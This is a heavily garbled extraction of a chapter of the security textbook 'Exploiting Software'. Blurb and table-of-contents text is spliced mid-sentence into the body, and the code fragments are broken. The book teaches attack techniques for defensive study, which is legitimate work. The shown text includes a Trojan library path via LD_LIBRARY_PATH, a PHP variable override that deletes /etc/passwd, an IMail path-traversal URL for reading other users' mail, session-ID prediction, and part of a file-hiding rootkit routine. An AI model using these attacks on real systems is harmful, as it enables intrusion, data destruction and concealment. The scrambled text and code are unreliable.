By Gr eg Hoglund , Gar y McGr aw

The at t ack er supp lies v alues pr ior t o aut hent icat ion t h at alt er t h e t ar get p rocess en vir onm ent Pub lish er: Addison Wesley v ariab les. The key is t h at t h e en vir onm ent var iables ar e m odified befor e an y aut hent icat ion Pub Dat e: February 17, 200 4 code is u sed. I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

A r elat ed p ossibilit y is t h at du r in g a session, af t er aut h en t icat ion, a n orm al u ser is ab le t o m odif env iron ment v ariab les an d g ain elevat ed access. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are *firAttack Example: UNIX Environment Variable ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ch anging t h e LD_LIBRARY_PATH env ir onm ent v ar iable in TELNET w ill cause TELNET t o use an alt (Ex possibly ojan of a f unct rarles y . The Troj libs,raratyt ack m ustpat be p lo i t in Tr g S o ft )wvaer resion is loaded w it hion ex lib amp of r eal atan t ack t eraccessible ns, t ools, using an d t he t a syst em an shou by ld includ e Tr t h tat w ill user log it h sof a bad w or d. Th t echniqu esd used bad guy s ojan t o br code eak sof w ar e. allow I f y out he w ant t o tporot ectinyw our t w arpass e fr om tat hat t he y t o are a specif ic carr locat ionouon t ack , y at out acker m u st ufirpload st leart he n hTr owojan r eallibr at ar t acks really ied t . t he t arg et . As at ivebook t o upmloading a Tr oj an f ile,itsom f ilet ainly sy st em s supe por t fGet ile pat t hat Thisanmalt ustern - h ave ay shock y ou—and will ecer educat y ou. t ingh sbey ondinclu t hede r em add resses, scr ipt k id diesuch t r eatas m \\172.16.2.100\shared_files\trojan_dll.dll. en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

Technique: Leveraging Extraneous Variables

When net w or k secur it y m ech anisms do n ot w or k I n man y cases, soft w ar e m ay com e pr eset w it h v ar iou s par am et er s set b y defau lt . I n m any case Atare t ackset patwt it erhns v alues n o r egar d f or secu rit y . An at t ack er can lever age t h ese b rok en d ef ault s d ur ing Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur prPattern: ising at t acks ag ainst clien t soft war e Attack User-Supplied Global Variables (DEBUG=1, PHP Globals, and Forth) Tech niqu es f orSo cr aft ing m aliciou s inpu t The t echn ails of b uflike fer ov er f low s mb er of default config ur at ions ar e poor ly set . I n ser iously brical okendet langu ages PHP, a nu Tr yin g t hese ou t is on ly pr udent . Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak I n t he soft w arint e. er est of conv en ience ( laziness?) , some pr ogr am mer s m ay int egr at e " secr et var iables" i app licat ions. A secr et v ariab le wor k s like a code w or d. I f t h is secr et code w or d is used , t he ap pli t he vau lt . An ex am ple is a Web ap plicat ion t hat dist ing uish es bet w een nor m al users and adm inis check ing f or a h id den for m v ar iab le w it h a par t icular v alu e such as ADMIN=YES. Th is may sou nd m any int er nally dev elop ed Web- b ased app licat ions u sed by t he w or ld 's lar gest b ank s oper at e t h is one of t he t r icks t hat sof t w are audit ing t eam s look for . Som et im es t h ese t y pes of pr oblem s ar e not int ent ional on t he par t of pr ogr am mer s, bu t r at her c design" in a plat f orm or langu age. This is t he case wit h PHP global v ar iables.

* Attack Example: PHP Global Variables PHP is a st udy in b ad secu r it y . Th e m ain id ea perv adin g PHP is " ease of u se, " and t he m ant r a " d dev elop er g o t o any ex t r a w or k t o g et st uf f done" applies in all cases. This is accom p lished in PH r em ov ing for m alism fr om t h e langu age, allow in g d eclar at ion of v ar iables on f ir st use, init ializin g w it h pr eset v alues, and t ak ing ev er y m ean in gf ul v ar iab le fr om a t r ansact ion and m ak ing it av aila •of collision wit Table of Content h som et hings m ore t echn ical, t h e simp le alm ost alw ay s d ominat es in PHP. •

I ndex

On con ceHow of all t his t h at PHP allow s user s of a Web ap plicat ion t o over r id e env ir onm en Expleoit ingsequ Softwen a re to Br e akisCode w it h user sup plied , unt ru st ed qu er y v ar iables. Th us, crit ical v alues such as t he CWD and t he sea By Gr eg Hoglund , Gar y McGr aw be ov er wr it t en and dir ect ly cont rolled b y a r em ot e anon ym ous user . Pub lish sim er: Addison Wesleyuence is t hat v ariab les can be d ir ect ly con t r olled and assig ned f r om t he u Anot h er ilar conseq Dat e:vFebruary 17, 200 4 in GET an d POST r equest f ields. So seem ingly nor m al code lik e t h is, d contPub r olled alues supplied t hin gs:I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. while($count < 10){ Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om // Do something at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . $count++; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k Nor mally , t h is loop w ill execut e it s body t en t im es. Th e fir st it er at ion will b e an und ef ined zer o, a t ack pat ns w ill r esu lt in an in cr em ent of t he v ar iable $count. Th e pr oblem is t hat t he t r ips tAt h ough t h et er loop not init ialize t he v ar iable t o zer o befor e ent erin g t he loop. Th is is fin e becau se PHP init ializes t he Revion er se engineer declarat . The r esult in isgcode t hat seems t o f unct ion, regar dless of bad ness. Th e pr oblem is t ha t he Web ap plicat ion can su pply a requ est su ch as Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak GET /login.php?count=9 soft w ar e.

and cause $count t o st ar t ou t at t he v alue 9 , r esult in g in only on e t r ip t h r ough t he loop . Yerg . Depend in g on t h e config ur at ion, PHP may accept user - sup plied v ariab les in place of env iron men PHP in it ializes global var iables f or all pr ocess env ir onm en t v ar iables, su ch as $PATH an d $HOSTN v ariab les ar e of cr it ical im por t an ce becau se t hey m ay be u sed in f ile or net wor k op er at ions. I f a

can su pply a new $PATH v ar iable ( such as PATH='/var') , t h e pr ogr am m ay b e exp loit ab le. PHP m ay also t ake f ield t ags su pplied in GET/ POST r equ est s an d t r an sf or m t hem int o global var i t he case w it h t he $count v ar iable w e exp lored in our pr ev iou s exam ple. Con sider an ot her exam p le of t his pr oblem in w hich a pr ogr am d ef ines a v ar iable called $tempfi at t ack er can supp ly a n ew t em p file such as $tempfile = "/etc/passwd". Th en t h e t em p f ile m erased lat er via a call t o unlink($tempfile);. Now t he passw d file has b een erased—a bad t hin • m ost OSs. Table of Content s •

I ndex

Expl ing Softw tahat re How ak Code Alsooitconsider t hetou Br see of include() an d require() f ir st sear ch $PATH, an d t hat u sin g calls m Gr ayegexecut e ,cr ucial pr aw ogr am s such as ls. I n t h is w ay, ls may be " Tr ojan ed " ( t he at t ack er can m o By Hoglund Gar y McGr t o cau se a Tr ojan copy of ls t o be loaded) . This t y pe of at t ack cou ld also ap ply t o load able libr ar i $LD_LIBRARY_PATH is mod if ied . Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4 Finally, som e v ersions of PHP m ay pass user dat a t o sy slog as a for m at st r ing , t hu s ex posing t h e I SBN: 1- 786 95 -8 t o a f orm at 0-st20 ring b uff er over flow . Pages: 51 2

Technique: Leveraging Poor Session Authentication Som e ser v er s assign a special session I D t o a user. This m ay be in t h e for m of a cook ie ( as in HT How sof t w are br eak dohref' at t acker sofical t w ar e br eak ur ur pose? Why areis id en t ifi s, ors amnake um er v alue in a on st rpuct e. The u ser an emd boes ed ded session ID ? in How HTML fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? inst ead of a r easonab le for m of au t hent icat ion. Th e reasons f or t h is archit ect ur e m ay be t hat t he What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. lay er d oesn' t pr ovid e a st r ong aut h en t icat ion m ech anism , t he user is m obile, or t h e t ar get sy st e load balanced acr oss an arr ay of serv ers. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om The p r oblem is t hat t he session I D can be u sed t o look u p t he serv er- side st at e of t he u ser in a d at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . m em or y cache. The session I D is fu lly t r ust ed . Not e t hat t his m ean s t hat an at t acker can lev er ag r eq uest in g resour ces t hat ar e p riv at e or con fident ial. I f t he sy st em ch eck s only f or a valid sessio This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he at t ack er may be per m it t ed t o see t h e pr ot ect ed r esou rces. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t I f an applicat ion m aint ain s separ at e var iables for session I D and user I D , t hen t he ap plicat ion m exp loit ab lesof if tan hent icatwed sert inue sim ply chang esious t he psession Why w arau e tex ploit ill ucon t o be a ser r oblem I D . The ap plicat ion w ill not e t hat credent ials—t h at is, a cor r ect user key is b eing u sed. Af t er t his ch eck t ak es place, t he ap plicat ion acceptWhen s t he net session D. it y m ech anisms do n ot w or k w or k Isecur How ev , in pat a mt er ultns iuser syst em , t her e m ay be sever al sessions act iv e at any giv en t im e. The at t Ater t ack simp ly ch ange t he session I D w hile st ill using a cor r ect user key . Thu s, t he at t ack er st eals sessio belong t oerotse her users. in Wge hav e w it nessed a v er sion of t his in a lar ge v ideo conf er encing applicat Rev engineer a f inancial inst it u t ion. On ce log ged in , any u ser could hij ack ot her user' s v ideo st r eam s. Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

Attack Pattern: Session ID, Resource ID, and Blind Trust The t echn ical det ails of b uf fer ov er f low s When session an d resour ce I D s ar e sim ple an d available, at t ack er s can use t hem t o t heir Root k it s adv ant ag e. Many schem es are so sim ple t h at p ast in g in anot her kn ow n I D in a m essage st r eam w or ks. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. A v ar iat ion on t h e session I D at t ack exist s w hen an applicat ion allow s t h e user t o specify a r esou w ish t o access. I f t he user can sp ecify r esour ces b elong ing t o ot h er user s, t h en t he sy st em m ay at t ack .

* Attack Example: IPSwitch Imail, Blind Trusted Mailbox Name

Resour ces can be f iles, r ecor ds in a dat ab ase, or ev en p ort s and har dw ar e dev ices. I n a m ult iuse r esour ces m ay be p er sonal f iles an d e- m ail. Web- b ased e- mail sy st em s ar e a good exam ple of a m ult iuser env ir onm ent t hat oft en uses session I Ds. A r esour ce r eq uest m ay include addit ional id as a mailbox nam e. A per fect ex am ple is I PSw it ch I m ail, an e- m ail syst em t h at includ es a Web- b end for ret r iev ing e- m ail. A user w ill aut h en t icat e wit h t h e sy st em and w ill be g r ant ed a session t o read e- mail t hen look s som et hing lik e t h is: •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

http://target:8383//readmail.cgi?uid=username&mbx=../username/Main I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

A f ew pr oblem s ar e imm ediat ely app arent . Fir st , w e not ice t h at t h e user m ust sup ply not only t h bu t t h e usern ame as w ell. I n fact , t he user m ust also su pply a file pat h . The fact t h ese ident it y d How d oesmsof are br eak ?is How do gativt acker akesomet sof t whar eak t on pose? supp lied oret wt han once a dead eaw ays m t hat ineg br migh b epwurr ong w itWhy h t h eare r ead mail. c fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad I n pr act ice, if t he u ser nam e is sw apped w it h a dif fer en t u ser nam e, t he r equest st ill w org kuy s.s?I n f ac t ools can reak soft war is book rov ides t helike answ er s. rWhat eq uest r et ur ns be t h eu sed ot hert oubser 's mail! Ane? atTh t ack look s psom et hing t his: Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem http://target:8383//readmail.cgi?uid=username&mbx=../someone_elses_us When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g

Technique: Brute Forcing Session IDs Classic at t acks ag ainst serv er soft w ar e Session I D s should not be easy t o g uess or t o pr ed ict . Predict able n um ber s m ake lif e as an at t ac pr ising at t acks ainst t soft easierSur . Hacker s hav e devag elop ed clien a num ber war of ter icks for checkin g p redict abilit y in session I Ds. One fu n one inv olves t h e use of ph ase sp ace analysis. Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

Phase Space Analysis

Root k it s Delay ed coor dinat e em bedding is a t echniqu e t o g rap h a one- dim ensional n um ber ser ies as a dis Ex p losom i t ineg space S o ft w( asay re ,ist hr f illed wit h t h. eThe t ools, con cept s, and knar owound ledg eatnecessar reakan d is c ov er ee space) t echniq ue has been least sinycet o1b927 soft w art ex e. t s on dy nam ical syst em s. The pr act it ioner m easu res a sin gle v ariable in a dy nam ic sy st m any t im e. Once a sam ple set is obt ained, t he set is gr aph ed in m ult idim en sion al space. This causes r bet w een t h e dat a t o b ecom e app arent . The t echniq ue has im m ediat e benef it s for d et ect ing r and nu mb er set s. A pr ed ict ab le num ber sequence w ill show ev idence of st r uct ur e in t hr ee sp ace. A r a set w ill app ear as ev enly dist r ibut ed noise. The equ at ion used f or t he f ollowin g g rap hs is X[ n] = s[ n– 2] – s[ n –3]

Y[ n] = s[ n– 1] – s[ n –2] Z[ n] = s[ n] – s[ n–1 ] Think of t his equat ion as a comb t h at is b eing d rag ged t hr ough a num ber series ( Figur e 4- 1 1) . T bet w een t h e t eet h is k now n as t h e " lag, " w hich in t his case is one. The n um ber of t eet h is t he dim w hich in t h is case is t h r ee. The com b it self r epr esent s t h e point . As w e dr ag t he com b t hr oug h t h gr p ointofs.Content s • aph m any Table •

I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Figu r e 4 - 1 1 . Ph ase spa ce a na ly sis is lik e com b in g t hr oug h a nu m ber

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Figur e 4- 1 2 is a scr een shot of sev eral t hou san d p oint s sam pled f r om a MAC OS X ser ver . The n u sam pled is t h e init ial seq uence nu mb er of t he TCP st ack. I t is best if t his num ber is n ot easy t o p gr aphWhy w as sof m ade a simp pr ogr amt owbe r it taenser f or Wind ow s t hat plot s t h e point s using OpenGL t w arusin e exgploit w illlecon t inue ious p r oblem When net w or k secur it y m ech anisms do n ot w or k ns t h r e e- dim e nsion al p ha se spa ce plot of poi nt s. Th e da t a FiguAtrteack 4 -pat 1 2t er . A 1 0 0 ,0 0 0 sam p le s of t h e in it i al seq ue nce n u m b er s of M AC OS- X. Th is p Rev er se engineer in g cr e at ed usi ng t h e W i nd ow s Ope nGL code sh ow n l at e r . [ 9 ] Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . [ 9]

The plot in Figur e 4- 12 w as made using a dat a set presented by Michael Zalew sk i

This m ust -/h/ rave book iew m ay shock y ou—and it will cer ( http: azor .bindv .com / publish / papers/ tcpseq.htm l) .t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t The d ist r ibu t ion p lot t ed f or OS- X clear ly show s a p at t ern . The localized clust ers of point s ar e ar e I SN is m or e likely t o be select ed . A t ru ly ran dom I SN w ou ld n ot show t hese clu st er s. A t r uly r an sofFigur t w ar ee 4ex1ploit ill con a erence. ser ious The p r oblem is plotWhy t ed in 3 so wyou cant inue see tt o h ebe diff ran dom n um ber seq uence r esult s in dist r ibut ion ov er t he p hase sp ace diagr am show n in Figur e 4- 1 3. No localized st r uct u res ar e app When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns

Figu r eer se 4 - engineer 1 3 . A tin hgr e e- dim e nsion al p ha se spa ce plot of r a ndom poin t s l Rev w hi t e n oi se . Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Reading our Opwen ple: Ex p lo i t int hgeSdat o ftaw set a reint is oloaded it hGL exview amp er lesisofsim r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k in_file=fopen("data.bin", "r"); At t ack pat t er ns Rev er se engineer in g if(in_file) {

Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e ///////////////////////////////////////////////////

Tech niqu es f or cr aft ing m aliciou s inpu t // Create a data set or read it from somewhere. The t echn ical det ails of b uf fer ov er f low s /////////////////////////////////////////////////// Root k it s int i = 0; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. // This is cheap. int *pt_array = new int[99999];

float mean = 0;

while(!feof(in_file) && i < 99998) { char _c[64]; •

Table of Content s

fgets(_c, I ndex 62, in_file);



Expl oit ing Softw a re How to Br e ak Code

DWORD = atoi(_c); By Gr eg Hoglund , Gar s y McGr aw pt_array[i] = s;

Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4

i++;

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2 mean

+= s;

} mean = mean/i; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. int j=3; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d while(jdwLenToNext ); // This block was used in the JK code for alt //null.sys file information? •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

// left out for now ... -Greg //if( RtlCompareMemory( (PVOID)&p->suName[ 0

By Gr eg Hoglund , Gar y McGr aw

//(PVOID)&g_swRootSys[ 0 ], 20 ) == 20 ) Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

//{

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

//

p->ftCreate = fdeNull.ftCreate;

//

p->ftLastAccess = fdeNull.ftLastAccess;

//

p->ftLastWrite = fdeNull.ftLastWrite;

How d oes sof t w are br eak ? How do at t acker// s m akep->dwFileSizeHigh sof t w ar e br eak on p ur Why are = pose? fdeNull.dwFileSizeH fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e?// Th is book p rov ides t he answ s. p->dwFileSizeLow = er fdeNull.dwFileSizeLo Ex p lo i t in g S o ft w a re is loaded w it h ex amp//} les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . //else This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // compare directory-name prefix with '_root_ Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem //decide if to hide or not. When net w or k secur it y m ech anisms do n ot w or k if( RtlCompareMemory( (PVOID)&p->suName[ 0 ], At t ack pat t er ns (PVOID)&g_swFileHidePrefix[ 0 ], 12 ) == 12 ) Rev er se engineer in g { Classic at t acks ag ainst serv er soft w ar e if( bLastOne ) Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

{

The t echn ical det ails of b uf fer ov er f low s

if( p == (PDirEntry)

Root k it s

FileInformationBuffer )

rc e = necessar 0x80000006; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg y t o b reak soft w ar e. else pLast->dwLenToNext = break; } else

{ int iPos = ((ULONG)p) (ULONG)FileInformationBuffer; int iLeft = •

Table of Content s



I ndex

(DWORD)FileInformationBufferLength - iPos - p->dwLenToNext; Expl oit ing Softw a re How to Br e ak Code

RtlCopyMemory( (PVOID)p,

By Gr eg Hoglund , Gar y McGr aw

(PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft ); Pub lish er: Addison Wesley

continue;

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

}

Pages: 51 2

} pLast = p; How d oes sof t w are br eak ? How do at t ackerps =m ake sof t w ar e br eak on*)p p ur pose? Why are (PDirEntry)((char + p->dwLenToNext ); fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak} soft war e?!bLastOne Th is book p); rov ides t he answ er s. while( Ex p lo i t in } g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack } , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he return(rc); scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Patching Binary Code On e of t he b en ef it s of r ev erse eng in eer ing is t hat y ou can gain an und er st and in g of a pr ogr am in t er ms of it s binar y code. As y ou becom e acclimat ized t o t he pr ocess an d gain som e ex perience, begin t o not ice and r ecognize cert ain d at a st r uct ur es or subr ou t ines sim ply b y how t hey look in a •edit or . This m Table of Content s d, b ut y ou m ight be scr olling t h rou gh a b in ar y file at a lat er dat e and ay soun d w eir •y our self sayin I ndex g " oh , t her e's a ju mp t ab le" or " hu h, t h is is pr obably t he pr olog t o a subr out in e. " T Expl oitur ing to olves Br e ak Code a n at al Softw ab ilitayret How hat ev as y ou lear n t o und er st and m ach ine code d ir ect ly. Like ev ery t h in g, abilit im pr ov, es h praw act ice. By Gr egy Hoglund Garw y it McGr The f eeling of pow er associat ed w it h t his skill is v ery rew ar ding . Soon it becom es ob viou s t hat n Pub lish er: Addison Wesley code is sacr ed . Alt h ough t his is a clear t heoret ical r ealit y , it is one t h at f ew people com e t o g rasp Dat e: February 17, 200 4 any Pub t angible w ay . Even self- en cr y pt ed cod e can b e br ok en . Simp ly put , if cod e r uns on a pr ocess I 1- 786 95 m ust atSBN: som0-e20point be-8 d ecr yp t ed. The decr y pt ion r out ine it self can not be easily encr yp t ed at all Pages:y ears, 51 2 For m any t h e soft w ar e- cr ack in g com m unit y has w or ked har d on t he m any sub t le pr oblem r ev er se eng ineer ing . I n alm ost ev er y case, t he cr ack ing com mu nit y h as m anaged t o b reak ev er y par t icular copy p rot ect ion m echan ism u sed by sof t w are vend ors. Th e r ev erse eng in eer ing pr oces leads t o a copy of serial num ber g en er at ion code, or a binar y pat ch t hat r em ov es som e copy - che logic f rom t he t ar g et pr ogr am . As a good fr iend of our s alw ays say s, " I f it can be m ade, it can b un mad e. " sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are How d oes fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

Peephole Patches

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Pat ching som et h ing int o a pr ogr am w it h out alt er ing it s dat a st at e is an excellent t r ick t o k now . O at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . dir ect app licat ion of t his t r ick can b e used t o snoop dat a. You m ay w ant t o sn if f inf orm at ion in t h tThis ar get p r ogr am w it hout alt shock erin g tyhou—and e or iginalit pwill rogcer r amt ainly behav ior ineany discer m ust - h ave book m ay educat y ou.obv Getiously t ing bey ondnab t hele way can be don e using a p eeph ole pat ch. Not e t hat t he f und ament al goal of t his t ech niqu e is alw ays scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t add new cod e w it hout aff ect ing pr ogram st at e . BecauWhy se t he doeswnot r equir e tsour e access, it can be app lied t o alm ost an y soft w softtechniqu w ar e exeploit ill con t inue o becea cod ser ious p r oblem field com pon en t . Because t he t echn iq ue is n oninv asiv e t o CPU r eg ist er s, t he st ack , or h eap m em t he atWhen t ackernet can bek conf ident t he t echniqu e w ill w or secur it y mt hat ech anisms do n ot or knot alt er t he or iginal pr ogr am behav ior or b det ect ed by st an dar d measur es. At t ack pat t er ns I n t his exam p le, w e u se t he sect ion pad ding in a f orm at t ed execut able t o st or e addit ional code. Revpad er se engineer in g used t o sim ilar end s for year s by v ir us p rog ram s. We use t he t echniq u Sect ion ding has been her e t o add addit ional cod e t o t he execut ab le. Classic at t acks ag ainst serv er soft w ar e Let ' s add a t race st at em en t t o t he f ollow in g cod e: Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. int my_function( int a ) { if(a == 1) {

// TRACE("a is equal to one"); printf("ccc"); return 42; } • •

Table of Content s

